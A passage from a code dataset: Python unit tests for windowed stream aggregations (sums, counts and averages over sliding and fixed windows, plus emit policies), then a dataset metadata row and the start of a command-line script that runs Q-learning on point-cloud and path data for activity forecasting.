                        FieldAggregator("number_of_things", "col2", ["count"],
                                        SlidingWindows(['1h', '2h'], '15m')),
                        FieldAggregator("abc", "col3", ["sum"],
                                        SlidingWindows(['24h'], '10m'))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        controller.emit({'col1': i, 'col2': i * 1.2, 'col3': i * 2 + 4},
                        'tal', test_base_time + timedelta(minutes=i))
    controller.terminate()
    actual = controller.await_termination()
    # Events are a minute apart, so every window covers the whole history:
    # col1 sums are triangular numbers, counts are i + 1, and
    # sum(col3) = sum(2j + 4 for j <= i) = (i + 1) * (i + 4).
    # col2 is computed as i * 1.2 so the float artifacts match exactly.
    expected_results = []
    for i in range(10):
        stuff_sum = i * (i + 1) // 2
        stuff_avg = stuff_sum / (i + 1)
        expected_results.append({
            'col1': i, 'col2': i * 1.2, 'col3': i * 2 + 4,
            'number_of_stuff_sum_1h': stuff_sum, 'number_of_stuff_sum_2h': stuff_sum,
            'number_of_stuff_sum_24h': stuff_sum,
            'number_of_things_count_1h': i + 1, 'number_of_things_count_2h': i + 1,
            'abc_sum_24h': (i + 1) * (i + 4),
            'number_of_stuff_avg_1h': stuff_avg, 'number_of_stuff_avg_2h': stuff_avg,
            'number_of_stuff_avg_24h': stuff_avg})
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_simple_aggregation_flow():
    """Fixed (tumbling) windows reset at bucket boundaries, so the per-event
    counts depend on how the 25-minute event times line up with each bucket.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
                                        FixedWindows(['1h', '2h', '3h', '24h']))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
    controller.terminate()
    actual = controller.await_termination()
    # One row of counts per window size, indexed by event number.
    expected_counts = {
        '1h': [1, 1, 2, 3, 1, 2, 1, 2, 1, 2],
        '2h': [1, 2, 3, 4, 4, 5, 3, 4, 3, 4],
        '3h': [1, 2, 3, 4, 5, 6, 6, 7, 5, 6],
        '24h': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
    }
    expected_results = [
        {'col1': i,
         'number_of_stuff_count_1h': expected_counts['1h'][i],
         'number_of_stuff_count_2h': expected_counts['2h'][i],
         'number_of_stuff_count_3h': expected_counts['3h'][i],
         'number_of_stuff_count_24h': expected_counts['24h'][i]}
        for i in range(10)]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_emit_max_event_sliding_window_multiple_keys_aggregation_flow():
    """With EmitAfterMaxEvent(3), output is produced only on every third event
    per key: events 4/5 (third per key) and 10/11 (sixth per key).
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
                                        SlidingWindows(['1h', '2h', '24h'], '10m'))],
                       Table("test", NoopDriver()), emit_policy=EmitAfterMaxEvent(3)),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(12):
        controller.emit({'col1': i}, f'{i % 2}', test_base_time + timedelta(minutes=i))
    controller.terminate()
    actual = controller.await_termination()
    # (emitted col1, per-key running sum, per-key running average)
    expected_results = [
        {'col1': col1,
         'number_of_stuff_sum_1h': total, 'number_of_stuff_sum_2h': total,
         'number_of_stuff_sum_24h': total,
         'number_of_stuff_avg_1h': mean, 'number_of_stuff_avg_2h': mean,
         'number_of_stuff_avg_24h': mean}
        for col1, total, mean in [(4, 6, 2.0), (5, 9, 3.0), (10, 30, 5.0), (11, 36, 6.0)]]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_error_on_bad_emit_policy():
    """AggregateByKey must raise TypeError when given an emit-policy class
    (EmitEveryEvent) rather than an emit-policy instance.

    Fixes in this revision: the original statement ended with a stray comma,
    turning the call into a one-element tuple expression, and used a bare
    `assert False` inside the try block, which is stripped under `python -O`
    and carries no failure message.
    """
    try:
        AggregateByKey([], Table("test", NoopDriver()), emit_policy=EmitEveryEvent)
    except TypeError:
        pass  # expected: a class, not an instance, was passed
    else:
        raise AssertionError('AggregateByKey accepted an emit policy class instead of an instance')
def test_emit_delay_aggregation_flow():
    """Exercise EmitAfterMaxEvent(4, 1): emit after 4 events or after a delay.

    A bounded queue synchronizes the test thread with the flow so that the
    first emit is delay-triggered (3 events aggregated) and the later emits
    are max-event-triggered (4 more events each).
    """
    # Capacity-1 queue: the reducer signals, the producer loop waits.
    q = queue.Queue(1)
    def reduce_fn(acc, x):
        # col1 == 2 marks the first emitted record; unblock the producer
        # (waiting in q.get() below) once it has been observed.
        if x['col1'] == 2:
            q.put(None)
        acc.append(x)
        return acc
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "count"],
                                        SlidingWindows(['1h'], '10m'))],
                       # NOTE(review): second EmitAfterMaxEvent arg is presumably
                       # the delay in seconds — confirm against the storey API.
                       Table("test", NoopDriver()), emit_policy=EmitAfterMaxEvent(4, 1)),
        Reduce([], reduce_fn),
    ]).run()
    for i in range(11):
        if i == 3:
            # Block until the delayed emit covering events 0..2 has been seen,
            # so the remaining emits are driven by the 4-event maximum.
            q.get()
        data = {'col1': i}
        controller.emit(data, 'katya', test_base_time + timedelta(seconds=i))
    controller.terminate()
    actual = controller.await_termination()
    # Emits after events 0..2 (delay), 3..6 and 7..10 (max-event batches of 4).
    expected_results = [
        {'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_count_1h': 3},
        {'col1': 6, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_count_1h': 7},
        {'col1': 10, 'number_of_stuff_sum_1h': 55, 'number_of_stuff_count_1h': 11}]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_dict_simple_aggregation_flow():
    """AggregateByKey also accepts aggregation specs given as plain dicts;
    results must match the FieldAggregator-based equivalent.
    """
    aggregations = [{'name': 'number_of_stuff',
                     'column': 'col1',
                     'operations': ["sum", "avg", "min", "max"],
                     'windows': ['1h', '2h', '24h'],
                     'period': '10m'}]
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey(aggregations, Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
    controller.terminate()
    actual = controller.await_termination()
    # Events are 25 minutes apart: the 1h window holds the last 3 events,
    # the 2h window the last 5, and the 24h window the whole history.
    expected_results = []
    for i in range(10):
        window_values = {'1h': list(range(max(0, i - 2), i + 1)),
                         '2h': list(range(max(0, i - 4), i + 1)),
                         '24h': list(range(i + 1))}
        record = {'col1': i}
        for window, values in window_values.items():
            record[f'number_of_stuff_sum_{window}'] = sum(values)
            record[f'number_of_stuff_min_{window}'] = min(values)
            record[f'number_of_stuff_max_{window}'] = max(values)
            record[f'number_of_stuff_avg_{window}'] = sum(values) / len(values)
        expected_results.append(record)
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregate_dict_fixed_window():
    """Dict-defined aggregation without a 'period' key; the expected counts are
    identical to the explicit FixedWindows test with the same event times.
    """
    aggregations = [{'name': 'number_of_stuff',
                     'column': 'col1',
                     'operations': ["count"],
                     'windows': ['1h', '2h', '3h', '24h']}]
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey(aggregations, Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
    controller.terminate()
    actual = controller.await_termination()
    # One row of counts per window size, indexed by event number.
    expected_counts = {
        '1h': [1, 1, 2, 3, 1, 2, 1, 2, 1, 2],
        '2h': [1, 2, 3, 4, 4, 5, 3, 4, 3, 4],
        '3h': [1, 2, 3, 4, 5, 6, 6, 7, 5, 6],
        '24h': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
    }
    expected_results = [
        {'col1': i,
         'number_of_stuff_count_1h': expected_counts['1h'][i],
         'number_of_stuff_count_2h': expected_counts['2h'][i],
         'number_of_stuff_count_3h': expected_counts['3h'][i],
         'number_of_stuff_count_24h': expected_counts['24h'][i]}
        for i in range(10)]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_old_event():
    """An event far older than the largest window must pass through without any
    aggregation fields attached, leaving earlier results untouched.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg", "min", "max"],
                                        SlidingWindows(['1h', '2h', '24h'], '10m'))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(3):
        controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
    # 25 hours in the past — outside even the 24h window.
    controller.emit({'col1': 3}, 'tal', test_base_time - timedelta(hours=25))
    controller.terminate()
    actual = controller.await_termination()
    # With only 3 events 25 minutes apart, every window spans the full history.
    expected_results = []
    for i in range(3):
        values = list(range(i + 1))
        record = {'col1': i}
        for window in ('1h', '2h', '24h'):
            record[f'number_of_stuff_sum_{window}'] = sum(values)
            record[f'number_of_stuff_min_{window}'] = min(values)
            record[f'number_of_stuff_max_{window}'] = max(values)
            record[f'number_of_stuff_avg_{window}'] = sum(values) / len(values)
        expected_results.append(record)
    expected_results.append({'col1': 3})  # the stale event, forwarded bare
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_old_event():
    """A too-old event must pass through a fixed-window count aggregation
    without gaining any aggregation fields."""
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
                                        FixedWindows(['1h', '2h', '3h', '24h']))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()

    for idx in range(3):
        controller.emit({'col1': idx}, 'tal', test_base_time + timedelta(minutes=25 * idx))
    # An event 25 hours in the past, older than every configured window.
    controller.emit({'col1': 3}, 'tal', test_base_time - timedelta(hours=25))
    controller.terminate()
    actual = controller.await_termination()

    expected_results = [
        {'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1,
         'number_of_stuff_count_3h': 1, 'number_of_stuff_count_24h': 1},
        {'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2,
         'number_of_stuff_count_3h': 2, 'number_of_stuff_count_24h': 2},
        {'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3,
         'number_of_stuff_count_3h': 3, 'number_of_stuff_count_24h': 3},
        {'col1': 3},
    ]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_out_of_order_event():
    """An out-of-order (but still in-window) event must be counted into the
    bucket that matches its own timestamp."""
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
                                        FixedWindows(['1h', '2h']))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()

    for idx in range(3):
        controller.emit({'col1': idx}, 'tal', test_base_time + timedelta(minutes=25 * idx))
    # Late arrival: timestamp precedes the last in-order event.
    controller.emit({'col1': 3}, 'tal', test_base_time + timedelta(minutes=15))
    controller.emit({'col1': 4}, 'tal', test_base_time + timedelta(minutes=25 * 3))
    controller.terminate()
    actual = controller.await_termination()

    expected_results = [
        {'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1},
        {'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2},
        {'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3},
        {'col1': 3, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 2},
        {'col1': 4, 'number_of_stuff_count_1h': 3, 'number_of_stuff_count_2h': 5},
    ]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_fixed_window_roll_cached_buckets():
    """Emitting enough events to roll past the cached fixed-window buckets:
    counts must reset as each window boundary is crossed."""
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["count"],
                                        FixedWindows(['1h', '2h', '3h']))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    # 10 events at 25-minute intervals cross several window boundaries.
    for i in range(10):
        data = {'col1': i}
        controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))

    controller.terminate()
    actual = controller.await_termination()
    expected_results = [{'col1': 0, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 1, 'number_of_stuff_count_3h': 1},
                        {'col1': 1, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 2, 'number_of_stuff_count_3h': 2},
                        {'col1': 2, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 3},
                        {'col1': 3, 'number_of_stuff_count_1h': 3, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 4},
                        {'col1': 4, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 5},
                        {'col1': 5, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 5, 'number_of_stuff_count_3h': 6},
                        {'col1': 6, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 6},
                        {'col1': 7, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 7},
                        {'col1': 8, 'number_of_stuff_count_1h': 1, 'number_of_stuff_count_2h': 3, 'number_of_stuff_count_3h': 5},
                        {'col1': 9, 'number_of_stuff_count_1h': 2, 'number_of_stuff_count_2h': 4, 'number_of_stuff_count_3h': 6}]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_roll_cached_buckets():
    """Emitting enough events to roll past the cached sliding-window buckets:
    sum/avg/min/max must reflect only the events still inside each window."""
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg", "min", "max"],
                                        SlidingWindows(['1h', '2h'], '10m'))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    # 10 events at 25-minute intervals; older events slide out of the 1h/2h windows.
    for i in range(10):
        data = {'col1': i}
        controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))

    controller.terminate()
    actual = controller.await_termination()
    expected_results = [
        {'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_min_1h': 0, 'number_of_stuff_min_2h': 0,
         'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0},
        {'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_min_1h': 0, 'number_of_stuff_min_2h': 0,
         'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5},
        {'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_min_1h': 0, 'number_of_stuff_min_2h': 0,
         'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0},
        {'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_min_1h': 1, 'number_of_stuff_min_2h': 0,
         'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5},
        {'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_min_1h': 2, 'number_of_stuff_min_2h': 0,
         'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0},
        {'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_min_1h': 3, 'number_of_stuff_min_2h': 1,
         'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0},
        {'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_min_1h': 4, 'number_of_stuff_min_2h': 2,
         'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0},
        {'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_min_1h': 5, 'number_of_stuff_min_2h': 3,
         'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0},
        {'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_min_1h': 6, 'number_of_stuff_min_2h': 4,
         'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0},
        {'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_min_1h': 7, 'number_of_stuff_min_2h': 5,
         'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0}
    ]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_aggregation_unique_fields():
    """Two FieldAggregators sharing the same name must raise TypeError.

    The original used `assert False` to fail when no exception was raised,
    but asserts are stripped under `python -O`, which would make the test
    silently pass; an explicit AssertionError is immune to that.
    """
    try:
        build_flow([
            SyncEmitSource(),
            AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
                                            SlidingWindows(['1h', '2h', '24h'], '10m')),
                            FieldAggregator("number_of_stuff", "col1", ["count"],
                                            SlidingWindows(['1h', '2h'], '15m'))],
                           Table("test", NoopDriver())),
            Reduce([], lambda acc, x: append_return(acc, x)), ]).run()
    except TypeError:
        return  # expected: duplicate aggregation name rejected
    raise AssertionError('expected TypeError for duplicate aggregation name')
| 80.342733 | 139 | 0.628193 | 11,350 | 74,076 | 3.546608 | 0.015419 | 0.294728 | 0.230586 | 0.080116 | 0.968972 | 0.951185 | 0.945894 | 0.938416 | 0.93064 | 0.928504 | 0 | 0.09622 | 0.240415 | 74,076 | 921 | 140 | 80.429967 | 0.619191 | 0 | 0 | 0.736331 | 0 | 0 | 0.507303 | 0.461553 | 0 | 0 | 0 | 0 | 0.023086 | 1 | 0.025516 | false | 0.00243 | 0.006075 | 0 | 0.034022 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
d474aff6997180d3ba677233c457e563dbb2d77e | 14,191 | py | Python | main.py | szbokhar/EgoActivityForecasting | f402a7ea224a39c8236bb9fe064f06d053c66bc8 | [
"MIT"
] | null | null | null | main.py | szbokhar/EgoActivityForecasting | f402a7ea224a39c8236bb9fe064f06d053c66bc8 | [
"MIT"
] | null | null | null | main.py | szbokhar/EgoActivityForecasting | f402a7ea224a39c8236bb9fe064f06d053c66bc8 | [
"MIT"
] | null | null | null | import sys
import argh
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import scipy.io
import ipdb
import os
import util
import load_data
import su_2state as sarsa_util
import display
from RL_Config import *
@argh.arg('points_file',
          help='File containing point cloud data as list of points')
@argh.arg('path_pat',
          help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-s', '--sigma', help='Path reward sigma', default=5000)
def plot_path_rewards(points_file, path_pat, data_ids, config_dir, **extra):
    "Plot path rewards over the voxel grid"
    # NOTE: the docstring doubles as the argh command help; it previously said
    # "Run basic q-learning algorithm" (copy-pasted from basic_qlearn).
    rl_config = RL_Config()
    rl_config.set_parameters(
        blocksize=extra['blocksize'])
    rl_config.load_pointcloud(points_file)
    rl_config.load_action_files(config_dir)
    rl_config.load_path_data(path_pat, data_ids)
    rl_config.format_grid_and_paths()

    # Plotting is currently disabled; 'sigma' is only consumed by this call.
    #display.plot_path_reward(rl_config.path_NN, rl_config.voxel_grid, extra['sigma'])
    #plt.show()
@argh.arg('points_file',
          help='File containing point cloud data as list of points')
@argh.arg('path_pat',
          help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('-b', '--blocksize', default=0.5, help='Side length of grid cube')
@argh.arg('-s', '--start', default=0, help='Z level to begin plot at')
@argh.arg('-m', '--max_div', default=8, help='Divide max by this')
def show_denseplot(points_file, path_pat, data_ids, **extra):
    "Generate and show pointclound density plot"
    # Build the RL configuration from the point cloud and the path files,
    # then voxelize everything at the requested block size.
    cfg = RL_Config()
    cfg.set_parameters(blocksize=extra['blocksize'])
    cfg.load_pointcloud(points_file)
    cfg.load_path_data(path_pat, data_ids)
    cfg.format_grid_and_paths()

    #display.show_grid(cfg.voxel_grid, extra['start'], cfg.person_column, extra['max_div'])
    print(cfg.person_column)
    #plt.show()
@argh.arg('points_file',
          help='File containing point cloud data as list of points')
@argh.arg('path_pat',
          help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('-c', '--count', default=4000, help='Number of points to plot')
@argh.arg('-b', '--blocksize', default=0.5, help='Side length of grid cube')
def show_points_and_path(points_file, path_pat, data_ids, **extra):
    """
    Loads points and path data files and plots them
    """
    # 'count' is only consumed by the (currently disabled) plotting call below.
    count = extra['count']

    cfg = RL_Config()
    cfg.set_parameters(blocksize=extra['blocksize'])
    cfg.load_pointcloud(points_file)
    cfg.load_path_data(path_pat, data_ids)
    cfg.format_grid_and_paths()

    #display.make_basic_plot(cfg, 0, ['b-', 'r-', 'g-'], count)
    #plt.show()
@argh.arg('points_file',
          help='File containing point cloud data as list of points')
@argh.arg('path_pat',
          help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-a', '--alpha', help='Learning rate', default=0.5)
@argh.arg('-g', '--gamma', help='Discount factor', default=0.5)
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Iteration sample size', default=200)
@argh.arg('--state_functions', help='Functions specification',
          default=['hc_only_make_sarsa_lists', 'hc_only_NN', 'hc_only_reward', 'hc_only_transition'], nargs='+', type=str)
def basic_qlearn(points_file, path_pat, data_ids, config_dir, **extra):
    "Run basic q-learning algorithm"
    num_iter = extra['iter']
    memory_size = extra['memory_size']
    # (removed unused locals training_paths / training_labels)

    rl_config = RL_Config()
    rl_config.set_parameters(
        alpha=extra['alpha'],
        gamma=extra['gamma'],
        blocksize=extra['blocksize'])
    # Resolve the pluggable SARSA/state functions by name from su_2state.
    rl_config.paths_to_SARSA = getattr(sarsa_util, extra['state_functions'][0])
    rl_config.make_path_NN = getattr(sarsa_util, extra['state_functions'][1])
    rl_config.reward_function = getattr(sarsa_util, extra['state_functions'][2])
    rl_config.transition_function = getattr(sarsa_util, extra['state_functions'][3])

    rl_config.load_pointcloud(points_file)
    rl_config.load_action_files(config_dir)
    rl_config.load_path_data(path_pat, data_ids)
    rl_config.format_grid_and_paths()
    rl_config.paths_to_SARSA(rl_config)

    Q, vals = util.do_qlearn(rl_config, num_iter, memory_size)
    print('Finished basic Q-Learn. Uncomment dsiplay commands to see result.')
    #display.show_value(np.log(Q*1000+1), 13)
    #display.plot_1D(vals)
    #plt.show()
@argh.arg('points_file',
          help='File containing point cloud data as list of points')
@argh.arg('path_pat',
          help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-a', '--alpha', help='Learning rate', default=0.5)
@argh.arg('-g', '--gamma', help='Discount factor', default=0.5)
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Total memory size', default=200)
@argh.arg('-c', '--batch_size', help='Iteration sample size', default=200)
@argh.arg('-l', '--elength', help='Episode length ', default=500)
@argh.arg('-e', '--epsilon', help='epsilon greedy parameter', default=0.9)
@argh.arg('--state_functions', help='Functions specification',
          default=['hc_only_make_sarsa_lists', 'hc_only_NN', 'hc_only_reward', 'hc_only_transition'], nargs='+', type=str)
@argh.arg('--explore_functions', help='Functions specification',
          default=['hc_only_reset', 'hc_only_explore_step'], nargs='+', type=str)
@argh.arg('-r', '--rewards',
          help='Reward Values [Goal, Action Penalty, Wall Penalty, Path Reward]',
          default=[100, 100, 50, 0], nargs='+', type=float)
@argh.arg('--save', default=None, help='Save configuration and results in directory')
def explore_qlearn(points_file, path_pat, data_ids, config_dir, **extra):
    "Run exploration-based q-learning algorithm"
    num_iter = extra['iter']
    memory_size = extra['memory_size']
    batch_size = extra['batch_size']
    episode_length = extra['elength']

    rl_config = RL_Config()
    rl_config.set_parameters(
        alpha=extra['alpha'],
        gamma=extra['gamma'],
        epsilon=extra['epsilon'],
        blocksize=extra['blocksize'],
        rewards=extra['rewards'])
    # Resolve pluggable SARSA/state and exploration functions by name.
    rl_config.paths_to_SARSA = getattr(sarsa_util, extra['state_functions'][0])
    rl_config.make_path_NN = getattr(sarsa_util, extra['state_functions'][1])
    rl_config.reward_function = getattr(sarsa_util, extra['state_functions'][2])
    rl_config.transition_function = getattr(sarsa_util, extra['state_functions'][3])
    rl_config.get_random_state = getattr(sarsa_util, extra['explore_functions'][0])
    rl_config.explore_step = getattr(sarsa_util, extra['explore_functions'][1])
    rl_config.set_loadfiles(
        fn_points=points_file,
        fn_config=config_dir,
        fnp_path=path_pat,
        data_ids=data_ids)

    savefolder = extra['save']
    if savefolder is not None:
        # exist_ok avoids the exists()/makedirs() race of the original code.
        os.makedirs(savefolder, exist_ok=True)
        rl_config.save(savefolder)
        summpath = os.path.join(savefolder, 'summary.txt')
        summ = rl_config.get_summary()
        summ += "num_iter = {0}\t\t\t// number of training iterations\n".format(num_iter)
        summ += "batch_size = {0}\t\t\t//batch train size\n".format(batch_size)
        summ += "memory_size = {0}\t\t\t//total memory size\n".format(memory_size)
        summ += "episode_length = {0}\t\t\t//length of an episode\n".format(episode_length)
        # 'with' guarantees the handle is closed even if the write raises;
        # the original leaked the handle on error.
        with open(summpath, 'wb') as f:
            f.write(bytes(summ, 'UTF-8'))

    rl_config.load_data()
    rl_config.format_grid_and_paths()
    rl_config.paths_to_SARSA(rl_config)

    (Q, vals, umap) = util.do_explore_qlearn(rl_config, num_iter=num_iter,
                                             rand_count=batch_size, memory=memory_size, reset_episode=episode_length)

    if savefolder is not None:
        os.makedirs(savefolder, exist_ok=True)
        matpath = os.path.join(savefolder, 'Q-results.mat')
        scipy.io.savemat(matpath,
                         {'Q': Q, 'vals': vals, 'umap': umap, 'voxel_grid': rl_config.voxel_grid})
        print('Saved in :' + savefolder)

    print(rl_config.person_column)
@argh.arg('points_file',
          help='File containing point cloud data as list of points')
@argh.arg('path_pat',
          help='Filename pattern for path file data (eg. data/qm_hc{0}_{1}.txt)')
@argh.arg('data_ids', help='List of data ids', nargs='+', type=int)
@argh.arg('config_dir', help='Config directory')
@argh.arg('-a', '--alpha', help='Learning rate', default=0.5)
@argh.arg('-g', '--gamma', help='Discount factor', default=0.5)
@argh.arg('-b', '--blocksize', help='Grid block size', default=0.5)
@argh.arg('-i', '--iter', help='Number of q-learning iterations', default=1000)
@argh.arg('-m', '--memory_size', help='Total memory size', default=200)
@argh.arg('-c', '--batch_size', help='Iteration sample size', default=200)
@argh.arg('-l', '--elength', help='Episode length ', default=500)
@argh.arg('-e', '--epsilon', help='epsilon greedy parameter', default=0.9)
@argh.arg('--state_functions', help='Functions specification',
          default=['hc_only_make_sarsa_lists', 'hc_only_NN', 'hc_only_reward', 'hc_only_transition'], nargs='+', type=str)
@argh.arg('--explore_functions', help='Functions specification',
          default=['hc_only_reset', 'hc_only_explore_step'], nargs='+', type=str)
@argh.arg('-r', '--rewards',
          help='Reward Values [Goal, Action Penalty, Wall Penalty, Path Reward]',
